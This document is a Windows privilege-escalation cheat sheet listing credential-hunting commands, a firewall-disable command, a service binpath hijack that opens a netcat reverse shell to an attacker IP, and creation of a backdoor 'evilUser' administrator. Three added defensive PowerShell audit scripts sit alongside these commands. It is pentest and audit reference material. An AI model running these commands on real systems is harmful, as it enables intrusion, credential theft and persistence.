Windows Privilege Escalation

  1. Kernel Exploits
    1. Common Kernel Exploits
  2. Credentials
    1. Config Files
    2. Other Files
    3. IIS Web Server
    4. Group Policy Preferences
    5. Other Misc Passwords
    6. Find Potential Password Files
    7. Find Potential Passwords
  3. Firewall
  4. Misc
    1. PuTTY
    2. TightVNC
  5. Unquoted Service Paths
  6. Insecure Service Permissions
  7. Tasks
    1. Scheduled Tasks
    2. Link Running Tasks to Services
    3. Create Task
  8. Windows Services
    1. Query Services Permissions
    2. Managing or Manipulating Services
  9. Quick Useful Commands

Kernel Exploits

Look for missing KBs (Microsoft Knowledge Base updates): find the most recent one installed and Google it, then look for exploits that affect later versions.

  • systeminfo
  • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  • sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Common Kernel Exploits

  • MS17-010 - EternalBlue
  • MS16-014 - Applies to: Windows 7 SP1 x86
  • MS16-016 - 'WebDAV', applies to: Windows 7 SP1 x86 (Build 7601)
  • MS16-032 - Applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2

Credentials

Config Files

  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml
  • C:\unattend.xml
  • %WINDIR%\Panther\Unattend.xml
  • %WINDIR%\Panther\Unattend\Unattend.xml

Other Files

Other Group Policy Preference XML files that can carry a cpassword attribute:

  • Services\Services.xml
  • ScheduledTasks\ScheduledTasks.xml
  • Printers\Printers.xml
  • Drives\Drives.xml
  • DataSources\DataSources.xml

IIS Web Server

Internet Information Services (IIS) web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  • C:\inetpub\wwwroot\web.config

Group Policy Preferences

Local administrator passwords can be found in the Group Policy Preferences. The file Groups.xml, which contains the password, is cached locally, but it can also be obtained from the Domain Controller because every domain user has read access to it. The password is encrypted with AES, but Microsoft has published the key.

  • C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
  • \\{name}\SYSVOL\\Policies\{id}\MACHINE\Preferences\Groups\Groups.xml
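The following is an added audit script, not part of the original page: it sweeps a Preferences tree (the local History cache above, or a SYSVOL Policies share you are allowed to read) for any of the Preference XML files listed above that still carry a cpassword attribute, which is the MS14-025 finding. It reports the file, element and account so the preference can be removed or recreated without a stored password; it does not decrypt anything. The root path and the attribute names it looks at are the script's own assumptions.

```powershell
# Added example (not from the original page): find Group Policy Preference
# XML files that still carry a cpassword attribute. Read-only; nothing is
# decrypted. Assumption: $Root is a readable Preferences tree such as
# C:\ProgramData\Microsoft\Group Policy\History or \\<domain>\SYSVOL\...\Policies.
function Find-GppCpassword {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string]$Root
    )

    # Attribute names the different Preference types use for the account
    $accountAttrs = 'userName', 'accountName', 'runAs', 'username'

    Get-ChildItem -LiteralPath $Root -Recurse -Filter *.xml -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            try {
                [xml]$doc = Get-Content -LiteralPath $file -Raw -ErrorAction Stop
            } catch {
                return   # not well-formed XML; skip this file
            }

            # Every element (normally <Properties>) that has a cpassword attribute
            foreach ($props in $doc.SelectNodes('//*[@cpassword]')) {
                $account = $null
                foreach ($attr in $accountAttrs) {
                    if ($props.HasAttribute($attr)) {
                        $account = $props.GetAttribute($attr)
                        break
                    }
                }

                $parent  = $props.ParentNode          # User, Task, NTService, Drive, DataSource ...
                $changed = $null
                if ($parent -is [System.Xml.XmlElement]) { $changed = $parent.GetAttribute('changed') }

                [pscustomobject]@{
                    File     = $file
                    Element  = $parent.Name
                    Account  = $account
                    Changed  = $changed
                    HasValue = -not [string]::IsNullOrEmpty($props.GetAttribute('cpassword'))
                }
            }
        }
}

# Usage: scan the local GPP cache (the GUID folders are reached by -Recurse)
Find-GppCpassword -Root 'C:\ProgramData\Microsoft\Group Policy\History' | Format-Table -AutoSize
```

HasValue distinguishes a preference that really stores a password from one with an empty cpassword="" attribute. Any row with HasValue true should be removed from the GPO and the affected account's password rotated; DCs patched for MS14-025 refuse to save new password-bearing preferences but do not clean up existing ones.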

Other Misc Passwords

  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s
  • php.ini
  • httpd.conf
  • access.log

Find Potential Password Files

From C:\ level:

  • dir /b /s unattend.xml
  • dir /b /s web.config
  • dir /b /s sysprep.inf
  • dir /b /s sysprep.xml
  • dir /b /s *pass*
  • dir /b /s vnc.ini
  • dir /s *pass* == *cred* == *vnc* == *.config*

Find Potential Passwords

Search through files for the word 'password'

  • findstr /si password *.txt
  • findstr /si password *.xml
  • findstr /si password *.ini
  • findstr /si password *.xml *.ini *.txt

Firewall

Show Firewall Config

netsh firewall show config
netsh firewall show opmode

Disable Firewall

netsh firewall set opmode disable

Misc

PuTTY

  • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

TightVNC

  • reg query HKCU\Software\TightVNC\Server
  • vncpwd.exe <encrypted_password>

Unquoted Service Paths

If a service's binary path is unquoted and contains spaces, Windows tries each prefix that ends at a space as the executable, in order, before it reaches the real binary.

Example:

Service path: C:\Program Files\Some Folder\Service.exe

Windows tries, in order:

  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\Service.exe

List auto-start services outside C:\Windows whose path is not quoted:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Insecure Service Permissions

  • whoami, then net user <name> - enumerate the user's groups
  • accesschk.exe (part of Sysinternals)
  • accesschk.exe -ucqv <service name>
  • accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Does "Authenticated Users" have write access to a service?

On Windows XP, SSDPSRV and upnphost allow this by default:

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost

Tasks

Scheduled Tasks

On Server 2000, 2003 and XP, scheduled tasks run as SYSTEM. Do any of them call an .exe that is overwritable?

accesschk.exe -dqv <folder path>
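The following is an added audit script, not part of the original page, that covers the two findings above with built-in tools: services with unquoted paths whose probed directories a low-privilege user can write to, and scheduled-task binaries such a user could replace. It only reports. The principals treated as "low privilege", the rights treated as write-like and the use of Get-ScheduledTask (Windows 8 / Server 2012 and later; older hosts have only the schtasks line above) are the script's assumptions.

```powershell
# Added example (not from the original page): read-only audit for unquoted
# service paths and writable scheduled-task binaries. Assumptions: PowerShell 3+,
# Get-ScheduledTask available (Windows 8 / Server 2012+). Nothing is modified.

# Principals that mean "any local user" for this audit
$LowPrivIdentities = 'Everyone', 'BUILTIN\Users',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

# Rights that allow planting or replacing a file; GENERIC_WRITE / GENERIC_ALL
# are included because raw ACEs sometimes carry them instead of specific bits
$WriteLike = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Delete -bor
             [int][System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [int][System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             0x40000000 -bor 0x10000000

function Test-LowPrivWrite {
    # True if the file or directory grants write-like rights to a low-privilege principal
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteLike) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # Services whose binary path is unquoted and contains a space, with the
    # intermediate executables Windows would probe before the real one
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' } |
        ForEach-Object {
            # Keep the path up to the first ".exe"; anything after it is arguments
            $exe = if ($_.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $_.PathName }
            $parts = $exe -split ' '
            if ($parts.Count -lt 2) { return }        # no space in the binary path itself
            $probed = for ($i = 1; $i -lt $parts.Count; $i++) {
                ($parts[0..($i - 1)] -join ' ') + '.exe'
            }
            [pscustomobject]@{
                Service          = $_.Name
                StartMode        = $_.StartMode
                PathName         = $_.PathName
                Probed           = $probed
                # The finding matters only where a probed directory is writable
                WritableProbeDir = @($probed | Where-Object { Test-LowPrivWrite (Split-Path -Parent $_) })
            }
        }
}

function Get-WritableTaskBinary {
    # Scheduled tasks whose executable (or its directory) a low-privilege user can write
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }     # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not (Test-Path -LiteralPath $exe)) { continue }   # bare names resolved via PATH are skipped
            if ((Test-LowPrivWrite $exe) -or (Test-LowPrivWrite (Split-Path -Parent $exe))) {
                [pscustomobject]@{
                    Task   = $task.TaskPath + $task.TaskName
                    RunAs  = $task.Principal.UserId
                    Binary = $exe
                }
            }
        }
    }
}

# Usage: report only the services where a probed directory is actually writable
Get-UnquotedServicePath | Where-Object { $_.WritableProbeDir.Count -gt 0 } | Format-List
Get-WritableTaskBinary | Format-Table -AutoSize
```

Remediation for each reported service is to quote the binary path (sc config <service> binPath= "\"C:\Program Files\Some Folder\Service.exe\"") and to remove the write grant from the directory; for a task, tighten the ACL on the binary and its folder or point the task at a protected location.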

Link Running Tasks to Services

schtasks /query /fo LIST /v
tasklist /SVC

Create Task

net start "Task Scheduler"
at <hour:minute> /interactive "path to shell.exe"

Windows Services

Query Services Permissions

  • sc qc Spooler - queries spooler service
  • accesschk.exe /accepteula -ucqv Spooler (or accesschk_v5.02.exe on older machines like Windows XP SP1)
  • accesschk.exe /accepteula -uwcqv "Authenticated Users"
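The following is an added script, not part of the original page, that performs the same check as the accesschk lines above with built-in tools only: it reads each service's security descriptor with sc sdshow, parses the SDDL with .NET, and reports any ACE that grants a low-privilege principal rights sufficient to reconfigure or take over the service. The SID list and the access bits it treats as dangerous are the script's assumptions; sc.exe is assumed to be on PATH.

```powershell
# Added example (not from the original page): list service ACEs that give
# low-privilege principals change-config, delete or ownership rights.
# Read-only. Assumption: sc.exe on PATH (present on every Windows build).

# Service-specific and standard access bits (winsvc.h / winnt.h)
$SERVICE_CHANGE_CONFIG = 0x00000002
$DELETE                = 0x00010000
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$DangerousMask = $SERVICE_CHANGE_CONFIG -bor $DELETE -bor $WRITE_DAC -bor
                 $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'

function Get-WeakServiceAce {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$ServiceName)

    $out = & sc.exe sdshow $ServiceName 2>$null
    if ($LASTEXITCODE -ne 0) { return }               # access denied or no such service
    $sddl = $out | ForEach-Object { $_.Trim() } |
            Where-Object { $_ -match '^(O:|G:|D:|S:)' } | Select-Object -First 1
    if (-not $sddl) { return }

    # Parse the SDDL string into ACEs with numeric access masks
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if ($LowPrivSids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }

        $account = $null
        try { $account = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }

        [pscustomobject]@{
            Service         = $ServiceName
            Sid             = $ace.SecurityIdentifier.Value
            Account         = $account
            Mask            = '0x{0:X8}' -f $ace.AccessMask
            CanChangeConfig = ($ace.AccessMask -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_ALL -bor $GENERIC_WRITE)) -ne 0
        }
    }
}

# Usage: sweep every service and list the weak ACEs
Get-Service | ForEach-Object { Get-WeakServiceAce -ServiceName $_.Name } | Format-Table -AutoSize
```

Any row with CanChangeConfig true is the condition the accesschk -uwcqv "Authenticated Users" line above looks for; the fix is to reset the service DACL (sc sdset with a descriptor that drops the offending ACE) and to check the service's binary and registry key for the same weak grants.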

Managing or Manipulating Services

  • sc qc <service>
  • sc config <service> binpath= "C:\nc.exe -nv <myip> <myport> -e cmd.exe"
  • sc config <service> obj= ".\LocalSystem" password= ""
  • sc qc <service>
  • sc start <service>

Quick Useful Commands

  • hostname
  • echo %username%
  • whoami /priv
  • qwinsta - other logged-in users
  • net users
  • net user <username>
  • net localgroup
  • net localgroup Administrators
  • net user evilUser password123 /add
  • net localgroup Administrators evilUser /add
  • ipconfig /all
  • route print
  • arp -a
  • netstat -ano
  • C:\WINDOWS\System32\drivers\etc\hosts
  • DRIVERQUERY - Installed drivers
  • schtasks /query /fo LIST /v - Scheduled tasks
  • tasklist /SVC - Running processes
  • net start - Started services
